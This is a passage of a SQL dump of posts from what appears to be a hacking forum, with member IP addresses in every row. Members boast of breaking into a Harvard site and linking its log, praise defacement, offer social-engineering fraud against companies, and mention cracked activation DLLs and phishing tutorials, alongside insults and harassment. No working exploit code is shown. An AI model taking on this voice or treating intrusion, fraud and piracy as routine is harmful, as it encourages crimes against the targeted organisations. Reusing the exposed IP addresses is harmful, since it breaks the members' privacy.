'1349476016', '[quote=\'p420\' pid=\'3512\' dateline=\'1349475609\'] Nice hacks. You seem to be a pro web hacker. I bet someone will upload a deface but why don\'t you? [/quote] I don\'t honestly feel like doing it at the moment, sorry.', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', '86b043772527adf1b6d423e8f1df5138', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3515', '679', '3449', '4', 'RE: flamingworm here!', '0', '9', 'p420', '1349476176', 'Welcome amiga ;) How did you cum up wid your username?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a08b5df1395ce4acde7b19ef8280cf76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3516', '690', '0', '69', 'What are your fav or which coding languages do you know?', '0', '1', 't3h jok3r', '1349477700', 'What are your fav or which coding languages do you know? I know PHP, HTML, CSS, a little bit of Java and VB.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2d5e4146a1868e0c0e6732877156d385', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3517', '691', '0', '3', 'Gaming Section Released', '0', '1', 't3h jok3r', '1349479781', 'Finally the long awaited Gaming Section has been added. I had a plan to add more sub-forums and a minecraft forum too but they all are not going to be that active at the moment so added a couple not many. Link to Section: http://l33thacking.net/forum-70.html You can visit it by clicking the \"Gaming\" Tab as well. Also, I have added a couple of new sections under the [i]Coding[/i] Section as well. Hope you like the update, refer all yo game a friends ryt NOW :D [u][b]Vocab[/b][/u] Section AKA Tab', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0446ad949fac1e88bd02337f3915023e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3518', '692', '0', '71', 'COD Black OPs or COD MW3?', '0', '5', 'Timmy', '1349480570', 'Which game do you think is better black OPs or Modern Warfare 3?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '473f8ebbfc2493a32c2ce575976650c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3519', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349480582', 'Be with someone who won’t stay mad at you, who can’t stand not talking to you, and who’s afraid of losing you. Quote.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '024f15605e4bdfa43c7532265f2e16c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3520', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '82', 'iTzIpod', '1349480613', 'User is banned so he can\'t reply to that', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd35dbc477a7a11cf687cb0c31be5cb65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3521', '680', '3457', '35', 'RE: Some of my works...', '0', '82', 'iTzIpod', '1349480645', 'I\'m guessing Photoshop. But not sure which version though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd8389daec99ff12eea3ce445961894aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3522', '691', '3517', '3', 'RE: Gaming Section Released', '0', '82', 'iTzIpod', '1349480737', 'Woot. Hope this section becomes successful. Thanks for the update.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd531edc80167825a2e897f7b48a51131', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3523', '679', '3449', '4', 'RE: flamingworm here!', '0', '82', 'iTzIpod', '1349480769', 'How you spelt \"cum\"... Can\'t stop laughing. LOL', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4f60637d0271dd65894b364b9d6cf1db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3524', '692', '3518', '71', 'RE: COD Black OPs or COD MW3?', '0', '82', 'iTzIpod', '1349481086', 'How you spell the titles and all.... Lool I like Black Ops better than MW3. MW3 = Too much campers. Black Ops = More noobs = Higher K/D ;) PSN: SoaR_iPod, SoaR_Drastic, iTzExtremeiPod Add those 3.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd287de21ce8481fe158c72bd2b3fa5a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3525', '693', '0', '7', 'Hmmm?', '0', '3', '??????????¢™', '1349481345', 'Hey, is something wrong with the site because for some reason my username is changed and its not even changed to my old one before I changed it to iPownaholic. Could someone tell me whats going on?', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '490ab667334bb0b6390619a34588e5a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3526', '691', '3517', '3', 'RE: Gaming Section Released', '0', '3', '??????????¢™', '1349481382', 'Thats great, Now I could make a thread about me hosting a MW3 Knockback lobby.', '75.22.59.99', '1259748195', '1', '0', '3', '1349481392', '1', '82813b267d4684f285a6440955cb4cd6', '0', '1349481392'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3527', '693', '3525', '7', 'RE: Hmmm?', '0', '82', 'iTzIpod', '1349481721', 'No one likes you. Leave right now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb97ef61d4bd36abd540876faa6f971a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3528', '693', '3527', '7', 'RE: Hmmm?', '0', '3', '??????????¢™', '1349481881', '[quote=\'iTzIpod\' pid=\'3527\' dateline=\'1349481721\'] No one likes you. Leave right now. [/quote] Dude I am not leaving, Could you just tell me what happened?', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '79e91a2c39f0ccebf788fd6f87bea1ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3529', '693', '3525', '7', 'RE: Hmmm?', '0', '82', 'iTzIpod', '1349481928', 'So now you\'re just acting like you\'re all calm and nothing happened? Great. Did you get butthurt and finally got over it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d116b1f6f6016c2e3ec7e4d4a00fa43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3530', '693', '3529', '7', 'RE: Hmmm?', '0', '3', '??????????¢™', '1349482104', '[quote=\'iTzIpod\' pid=\'3529\' dateline=\'1349481928\'] So now you\'re just acting like you\'re all calm and nothing happened? Great. Did you get butthurt and finally got over it? [/quote] Dude I have been over it, but do you know what happened?', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'ef9b5796b347f20e13a38fda6c678bb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3531', '693', '3525', '7', 'RE: Hmmm?', '0', '82', 'iTzIpod', '1349482264', 'You got demoted. And started complaining like a bitch. I know what happened. And you don\'t know what happened since you don\'t know why your name changed..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '081e4cbbab23a1661b23bee811d536b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3532', '693', '3531', '7', 'RE: Hmmm?', '0', '3', '??????????¢™', '1349483431', '[quote=\'iTzIpod\' pid=\'3531\' dateline=\'1349482264\'] You got demoted. And started complaining like a bitch. I know what happened. And you don\'t know what happened since you don\'t know why your name changed.. [/quote] I know that but I dont know why my name was changed to a shitty name?', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '2758f533c6f27fc3f93161f9e4fad906', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3533', '693', '3525', '7', 'RE: Hmmm?', '0', '82', 'iTzIpod', '1349485122', 'Who cares. ipownaholicTM was shitty too. Wasn\'t any difference.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '76b27cd15fd88999cdfb3e20d3691a66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3534', '680', '3457', '35', 'RE: Some of my works...', '0', '222', 'Exposé', '1349488644', 'I used Photoshop cs6 ofc :D. And thanks guys...', '74.76.76.132', '1246514308', '0', '0', '222', '1349488656', '1', 'e09f978b6c232628f5b5007ebb16b324', '0', '1349488656'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3535', '694', '0', '71', 'Gamers Recruitment', '0', '61', 'NXK', '1349489163', 'I will now accept applications VIA group CP. You can Apply there.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c78784b4b9a41b2e22300197c35b9b98', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3536', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349489980', 'Lol haha I do that alot too (not cum hehe) but spell it like that', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '7e718b46ef78af7a0b62d839f9cb4491', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3537', '693', '3525', '7', 'RE: Hmmm?', '0', '222', 'Exposé', '1349490046', 'Lol so much fail in this thread right now (facepalm)', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '6095aba57729acd07de93e12023e599f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3538', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '222', 'Exposé', '1349490083', 'Nice thanks for the share. I have a voicechanger already but I\'ll try this one out :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '5507f39d263549d48aa6b2220504f01b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3539', '567', '2811', '16', 'RE: How to SE McDonalds', '0', '222', 'Exposé', '1349490114', 'Haha iv\'e seen this method all over the internet...but thanks :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '583b0771ccb7303b093f79fa9e6fef7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3540', '695', '0', '16', 'If you need help...i\'m here!', '0', '222', 'Exposé', '1349490202', 'I think I am at a level where I can say I am an experienced SE\'r. I have done companies like alienware, apple, dell (my method) and many more big companies...and ofc the smaller ones. If you guys need help SE\'ing or just need tips let me know and i\'ll do my best to help you guys out!', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '3844fd117fa9dacb62d6b332da8dc273', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3541', '655', '3253', '43', 'RE: ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '222', 'Exposé', '1349490256', 'Thanks...but I just use a cracked .dll file or whatever and that actually bypasses the activation...', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '955aaac46b57b1408194de2bf0ad530b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3542', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '222', 'Exposé', '1349490441', 'Lol...does it really matter. Unless your not doing anything illegal you shouldn\'t be worried :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'a30c75daed61bb391911ee626750ec4e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3543', '454', '2139', '35', 'RE: L33THacking Logo attempt 2', '0', '222', 'Exposé', '1349490556', 'I like it but its a little too dark. Maybe use the same grey as the BG or something. Don\'t love the black...', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '89069d8c1a48dda1b8578a57411baf24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3544', '679', '3449', '4', 'RE: flamingworm here!', '0', '61', 'NXK', '1349493359', 'I thought you were the coder from HF also.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '854b79a3e8e1d8fa857dec9b6721e350', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3545', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349493597', 'Lol everyone thinks that..but I had the username long before he did lol...', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '40e5a63b3d85fa7a0c84e071e45f4b27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3546', '693', '3525', '7', 'RE: Hmmm?', '0', '1', 't3h jok3r', '1349494975', 'iTzIpod, he did get demoted and was bitching around but how did you feel when you banned on TP etc etc etc? That\'s how reborn felt, he planned on staying on LH and becoming HQ and if we don\'t support him neither we would hurt him but also regret giving someone a chance to reform their mistakes. BTW, I answered your question via PM. All members should be treated equally exactly how I treat others equally :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '771d313c4e6c565536f8d5f01622ffb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3547', '695', '3540', '16', 'RE: If you need help...i\'m here!', '0', '1', 't3h jok3r', '1349495175', 'We actually have a user that needs something SE\'d. He might be willing to pay as well. Help Thread: http://l33thacking.net/thread-637.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '373a291311ddc128659515a3e2b8e007', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3548', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '222', 'Exposé', '1349495232', 'Do you still need this..I might be able to help you out :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a4f7e11afe1946b7c01c19761779c96b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3549', '693', '3546', '7', 'RE: Hmmm?', '0', '3', '??????????¢™', '1349495432', '[quote=\'t3h jok3r\' pid=\'3546\' dateline=\'1349494975\'] iTzIpod, he did get demoted and was bitching around but how did you feel when you banned on TP etc etc etc? That\'s how reborn felt, he planned on staying on LH and becoming HQ and if we don\'t support him neither we would hurt him but also regret giving someone a chance to reform their mistakes. BTW, I answered your question via PM. All members should be treated equally exactly how I treat others equally :D [/quote] Thanks man, Well now you see how they treat me now.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '1d7846e89b237baff6b968cff1bb0a19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3550', '696', '0', '13', '[HACKED] http://content.hks.harvard.edu', '0', '223', 'StarZ', '1349495564', 'Yep, title. http://pastebin.com/ikRHx6a7', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', 'a4861357735878fbac9b647ce158fef2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3551', '693', '3525', '7', 'RE: Hmmm?', '0', '222', 'Exposé', '1349495575', 'Yes black people should all be treated fairly...lolwut? /me walks away slowly', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '70f5600255b9e8f888342959b886275a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3552', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '222', 'Exposé', '1349495686', 'Lol iv\'e seen a much simpler version of this tut on HF....:facepalm:. Your version seems a little too complex...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '44abafec180c24d9de7c224f20b8dbe6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3553', '696', '3550', '13', 'RE: [HACKED] http://content.hks.harvard.edu', '0', '222', 'Exposé', '1349495787', 'Lol oh shit nice..Why is there only one user shown tho in the log?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e955e48acb41cf80afb747f6cd4374ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3554', '697', '0', '74', 'Who plays Minecraft out here?', '0', '1', 't3h jok3r', '1349495847', 'Curious about how many LH members play Minecraft.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2d559ff482d9cf2d4ec0e6983c03397c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3555', '682', '3478', '49', 'RE: Hmm', '0', '222', 'Exposé', '1349495892', 'Oh dam we have a she on LH? Proof or GTFO is mah motto :P Hehe jk :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e451f798dce5c33f679252bc77d9891a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3556', '696', '3553', '13', 'RE: [HACKED] http://content.hks.harvard.edu', '0', '223', 'StarZ', '1349495972', '[quote=\'flamingworm\' pid=\'3553\' dateline=\'1349495787\'] Lol oh shit nice..Why is there only one user shown tho in the log? [/quote] There\'s a lot more, trust me.', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', '7859a5a9c2a10f6211a4b09e0c306121', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3557', '698', '0', '7', 'Skype group anyone?', '0', '222', 'Exposé', '1349495981', 'Hey since this site is kinda new and all...anyone wanna get a skype group going.... and I don\'t mean like 100 members...just a couple of you active guys and we can chat. Anyone be up for that?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '424a4a46c88b0b320c4d77c3034427f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3558', '190', '665', '56', 'RE: Copy and paste game', '0', '222', 'Exposé', '1349496021', 'http://content.hks.harvard.edu/carr/intranet/login.htm ...lol that\'s what I have :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '59335cab2b3ce14ff9578cced08aa7c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3559', '699', '0', '47', '[All Members] Advance Member System', '0', '3', '??????????¢™', '1349496029', '[b]Hello all LH members, Today I am here to giveaway an Advanced Member System Source that I bought from codecanyon yesterday. To get this all you have to do is Post below and I will PM you withing 24 hours. DEMO: http://codecanyon.net/item/advanced-member-system/2333683?ref=nfo23[/b]', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '9f972754c1e391e7c1ca97c266ecf4ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3560', '696', '3550', '13', 'RE: [HACKED] http://content.hks.harvard.edu', '0', '222', 'Exposé', '1349496128', 'Oh haha ok...I figured :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'f9ee3c1646e6bd2d111956e51a7fe7f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3561', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '222', 'Exposé', '1349496260', 'Isn\'t iPownaholic™ a previous admin or something...and what did he do. Can anyone summarize?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '65661d66f398b0e9170c442d5cf56303', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3562', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349496325', 'Guys this is all over, I know why I was demoted so now I am all good. Just forget about it.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '12a4546770bb08046e4f5eaae4c2b6d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3563', '446', '2058', '28', 'RE: This forum is dead..', '0', '222', 'Exposé', '1349496356', 'I can help advertise the site a little on other forums and that good stuff. What are we using for advertising atm?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'bde665ada5333928179058ec6ffbbc62', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES 